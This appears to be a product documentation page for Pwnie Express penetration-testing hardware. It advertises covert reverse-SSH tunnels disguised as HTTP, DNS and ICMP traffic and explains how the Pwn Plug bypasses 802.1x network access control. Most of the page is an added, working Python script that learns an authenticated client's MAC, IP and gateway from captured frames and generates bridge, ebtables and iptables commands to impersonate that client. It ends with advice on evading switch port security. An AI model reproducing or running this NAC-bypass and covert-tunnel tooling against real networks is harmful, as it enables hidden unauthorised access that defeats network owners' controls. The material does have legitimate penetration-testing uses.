Pwnie Express is committed to maintaining relevant and useful documentation for its products. Find the latest documentation below.
- Citadel PX Manual (Request from Support)
- Pwn Pad User Manual
- Pwn Appliance User Manual
- Pwn Plug R2 User Manual
- Pwn Plug User Manual
- Power Pwn User Manual
- Pwn Phone User Manual
:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.
:: All tunnels are carried inside SSH and are re-established automatically wherever the plug has outbound Internet access.
:: The following covert tunneling options are available for traversing strict egress filtering and application-aware IPS:
- SSH over any TCP port
- SSH over HTTP requests (appears as standard HTTP traffic)
- SSH over SSL (appears as HTTPS)
- SSH over DNS queries (appears as DNS traffic)
- SSH over ICMP (appears as outbound pings)
- SSH Egress Buster (top 10 common egress ports)
- Out-of-band SSH over 3G/GSM cellular (Elite models)
Pwn Plug Toolkit
The following open source pentesting tools are included on all Pwn Plug / Power Pwn products. [repository here]
All aboard! Pwnie Express has done it again. In addition to supporting both 3G and Wireless connectivity, the Pwn Plug Elite can bypass virtually all NAC/802.1x/RADIUS implementations, providing a reverse shell backdoor and full connectivity to NAC-restricted networks!
How does it work?
- First, the Pwn Plug is placed in-line between an 802.1x-enabled client PC and the wall jack or switch port.
- Using a modified layer 2 bridging module, the Pwn Plug transparently passes the 802.1x EAPOL authentication frames between the client PC and the switch (a stock Linux bridge would drop them, because EAPOL uses the link-local destination address 01:80:c2:00:00:03).
- Once the 802.1x authentication completes, the switch grants the port connectivity to the network.
- The first outbound port 80 packet to leave the client PC gives the Pwn Plug the PC's MAC and IP address, and that frame's destination MAC identifies the default gateway.
- To avoid tripping the switch's port security (a second MAC address on the port) or forcing a re-authentication, the Pwn Plug then establishes its reverse SSH connection using the MAC and IP address of the already-authenticated client PC.
- Once connected to the plug's SSH console, you have access to any internal subnets reachable from the client PC. As an added bonus, because the plug sends its traffic to the learned gateway MAC, which forwards it back into the subnet, connections to other systems within the client PC's local subnet appear to source from the subnet's gateway rather than from the PC.
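The steps above, as an added example that is not Pwnie Express code: a parser that learns the client's MAC, IP and gateway MAC from its first outbound TCP/80 frame (handling 802.1Q tags and rejecting non-TCP, non-port-80 and broadcast frames), and a function that turns that into the Linux bridge, ebtables and iptables rules needed to borrow the client's identity. The interface names (eth0 switch side, eth1 client side, br0), the plug's link-local address 169.254.66.66, the fake next hop 169.254.66.1 and the reserved source-port range 61000-62000 are assumptions; the rule layout follows the published transparent-bridge technique (Duckwall, DEF CON 19), not the Pwn Plug's own implementation. The sample frame is constructed inline.

```python
"""Added example (not Pwnie Express code). Assumed: Linux bridge + ebtables/iptables,
eth0 = switch side, eth1 = client side, br0 = bridge, plug IP 169.254.66.66,
fake next hop 169.254.66.1, reserved source ports 61000-62000 (ports the client
itself never uses, so replies to the plug can be told apart from client traffic)."""
import ipaddress
import struct

ETH_P_IP = 0x0800
ETH_P_8021Q = 0x8100


def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def make_tcp_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, vlan=None, proto=6):
    """Constructed test input: minimal Ethernet/IPv4/TCP SYN (checksums left zero)."""
    l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 1, 0x4000, 64, proto, 0,
                     ipaddress.IPv4Address(src_ip).packed, ipaddress.IPv4Address(dst_ip).packed)
    hdr = bytes.fromhex(dst_mac.replace(":", "")) + bytes.fromhex(src_mac.replace(":", ""))
    if vlan is not None:
        hdr += struct.pack("!HH", ETH_P_8021Q, vlan)  # 802.1Q tag, PCP 0
    return hdr + struct.pack("!H", ETH_P_IP) + ip + l4


def learn_client(frame: bytes):
    """Return {client_mac, client_ip, gateway_mac, vlan} for an outbound TCP/80 frame
    seen on the client-facing port, or None for anything else.
    Caveat: the destination MAC is the gateway's only when the destination IP is
    off-subnet; a port-80 connection to a local host would yield that host's MAC."""
    if len(frame) < 14:
        return None
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    off, vlan = 14, None
    if ethertype == ETH_P_8021Q:
        if len(frame) < 18:
            return None
        tci, ethertype = struct.unpack("!HH", frame[14:18])
        vlan, off = tci & 0x0FFF, 18
    if ethertype != ETH_P_IP or len(frame) < off + 20:
        return None
    ihl = (frame[off] & 0x0F) * 4
    if frame[off] >> 4 != 4 or ihl < 20 or len(frame) < off + ihl + 4:
        return None
    if frame[off + 9] != 6:                       # TCP only
        return None
    src_ip = ipaddress.IPv4Address(frame[off + 12:off + 16])
    dport = struct.unpack("!H", frame[off + ihl + 2:off + ihl + 4])[0]
    if dport != 80 or src_ip.is_unspecified or dst[0] & 1:   # no pre-DHCP or bcast/mcast frames
        return None
    return {"client_mac": _mac(src), "client_ip": str(src_ip), "gateway_mac": _mac(dst), "vlan": vlan}


def bridge_rules(client, plug_mac, sw_if="eth0", cl_if="eth1", br="br0",
                 plug_ip="169.254.66.66", fake_gw="169.254.66.1", ports=(61000, 62000)):
    """Shell commands (assumed layout) that bridge EAPOL and impersonate the client."""
    lo, hi = ports
    return [
        f"ip link add name {br} type bridge",
        f"ip link set {sw_if} master {br}",
        f"ip link set {cl_if} master {br}",
        # group_fwd_mask bit 3 makes the kernel forward EAPOL (01:80:c2:00:00:03),
        # which a stock bridge drops; this replaces a patched bridge module on kernels >= 3.2
        f"echo 8 > /sys/class/net/{br}/bridge/group_fwd_mask",
        "sysctl -w net.ipv6.conf.all.disable_ipv6=1",   # stay silent: no RS/NS/MLD from the plug
        f"ip link set {br} address {plug_mac}",
        f"ip link set {br} up",
        f"ip addr add {plug_ip}/24 dev {br}",
        # everything is routed to a fake next hop pinned to the real gateway's MAC
        f"ip neigh add {fake_gw} lladdr {client['gateway_mac']} dev {br} nud permanent",
        f"ip route add default via {fake_gw} dev {br}",
        # L2: rewrite the plug's source MAC to the client's on the switch side (ARP too)
        f"ebtables -t nat -A POSTROUTING -s {plug_mac} -o {sw_if} -j snat "
        f"--to-source {client['client_mac']} --snat-arp",
        # L3: SNAT to the client's IP using the reserved port range
        f"iptables -t nat -A POSTROUTING -o {br} -s {plug_ip} -p tcp -j SNAT "
        f"--to-source {client['client_ip']}:{lo}-{hi}",
        # replies arrive addressed to the client's MAC; steer those in our port range to
        # the local stack, where conntrack reverses the SNAT
        f"ebtables -t nat -A PREROUTING -i {sw_if} -d {client['client_mac']} -p IPv4 "
        f"--ip-proto tcp --ip-dport {lo}:{hi} -j redirect --redirect-target ACCEPT",
    ]


if __name__ == "__main__":
    # constructed sample: client 10.0.5.23 opening TCP/80 to an off-subnet host via the gateway
    frame = make_tcp_frame("00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff",
                           "10.0.5.23", "93.184.216.34", 50123, 80)
    learned = learn_client(frame)
    print(learned)
    print("\n".join(bridge_rules(learned, plug_mac="02:00:00:00:00:01")))
```

Run the generated commands only after 802.1x has completed and before the plug emits any frame of its own; a single frame with the plug's real MAC is enough to trip port security on a switch that limits MACs per port.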